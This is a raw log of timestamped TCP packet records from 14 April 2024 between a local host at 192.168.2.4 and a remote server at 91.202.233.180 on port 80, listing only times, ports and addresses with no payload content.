Apr 14, 2024 08:45:42.469194889 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.469249010 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.469326973 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.469360113 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.469384909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.469414949 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.469552994 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.469609022 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.469660997 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.469695091 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.469708920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.469728947 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.469746113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.469763041 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.469779968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.469815969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.469865084 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.469899893 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.469918013 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.469933033 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.469955921 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.469968081 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.469981909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.470000982 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.470020056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.470043898 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.470156908 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.470223904 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.470257044 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.470284939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.470309019 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.470588923 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.470643997 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.470685005 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.470740080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.470818043 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.470873117 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.470957994 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.470993996 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.471015930 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.471028090 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.471045971 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.471084118 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.471131086 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.471164942 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.471184969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.471215963 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.471637011 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.471694946 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.471707106 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.471750021 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.471826077 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.471887112 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.471971035 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.472002983 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.472023010 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.472035885 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.472059011 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.472069025 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.472083092 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.472121000 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.472187996 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.472253084 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.472316027 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.472348928 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.472373009 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.472382069 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.472395897 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.472415924 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.472440958 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.472449064 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.472460985 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.472503901 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.472649097 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.472704887 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.472778082 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.472811937 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.472826958 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.472867966 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.472999096 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.473032951 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.473056078 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.473084927 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.473140001 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.473172903 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.473195076 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.473206043 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.473218918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.473259926 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.473367929 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.473401070 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.473421097 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.473450899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.473547935 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.473617077 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.473676920 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.473731041 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.473922014 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.473978043 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.474059105 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.474093914 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.474118948 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.474148989 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.474375963 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.474432945 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.474518061 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.474569082 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.474600077 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.474616051 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.474647999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.474678993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.474735022 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.474785089 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.474961042 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.475023031 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.475136042 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.475188017 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.475199938 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.475250006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.475384951 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.475400925 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.475415945 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.475447893 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.475447893 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.475480080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.475563049 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.475578070 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.475593090 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.475630999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.475661993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.475667953 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.475684881 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.475699902 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.475714922 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.475733042 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.475749969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.476010084 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.476026058 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.476057053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.476080894 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.476082087 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.476125956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.476214886 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.476281881 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.476300001 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.476349115 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.476430893 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.476480961 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.476581097 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.476635933 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.476681948 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.476699114 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.476713896 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.476730108 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.476767063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.476767063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.476946115 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.476963043 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.476977110 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477008104 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477008104 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477040052 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477170944 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477186918 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477200985 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477216005 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477243900 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477243900 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477277040 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477293968 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477308989 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477365017 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477422953 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477438927 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477454901 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477471113 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477478027 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477478027 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477508068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477528095 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477541924 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477557898 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477572918 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477586985 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477598906 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477598906 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477619886 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477637053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477663994 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477713108 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477762938 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477813005 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477813959 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477861881 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.477906942 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.477952003 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478039026 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478054047 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478069067 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478085041 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478085995 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478100061 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478110075 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478116035 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478131056 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478137970 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478137970 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478157997 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478173971 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478305101 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478322029 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478336096 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478353977 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478369951 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478373051 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478384018 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478399038 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478400946 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478400946 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478414059 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478420019 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478429079 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478441000 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478476048 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478494883 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478507042 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478522062 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478535891 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478564978 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478564978 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478585958 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478614092 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478631020 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478674889 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478878975 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478935957 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.478959084 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478991032 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.478991032 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479011059 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479027033 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479042053 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479057074 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479067087 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479084969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479108095 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479116917 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479131937 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479146004 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479171991 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479171991 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479203939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479353905 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479370117 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479384899 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479398966 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479413033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479429007 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479434013 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479454041 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479549885 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479598999 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479598999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479655027 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479676962 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479691982 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479707003 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479732037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479732037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479753971 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479758978 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479775906 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479830980 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479921103 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479937077 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.479976892 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479976892 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.479994059 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480024099 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480038881 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480084896 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480086088 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480120897 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480168104 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480359077 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480376005 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480391979 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480431080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480431080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480468035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480498075 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480515003 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480528116 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480541945 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480557919 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480567932 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480572939 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480587959 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480588913 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480608940 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480628014 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480644941 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480715990 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480731964 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480748892 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480766058 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480798006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480798006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480803013 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480854034 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.480911970 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.480967999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.481015921 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.481065035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.481240988 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.481317043 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.481503963 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.481519938 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.481575012 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.481604099 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.481769085 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.481812000 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.481831074 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.481873989 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.488116026 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.488306999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.655458927 CEST	80	49740	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.657285929 CEST	49740	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.716455936 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.716519117 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.716556072 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.716593981 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.716720104 CEST	49741	80	192.168.2.4	91.202.233.180
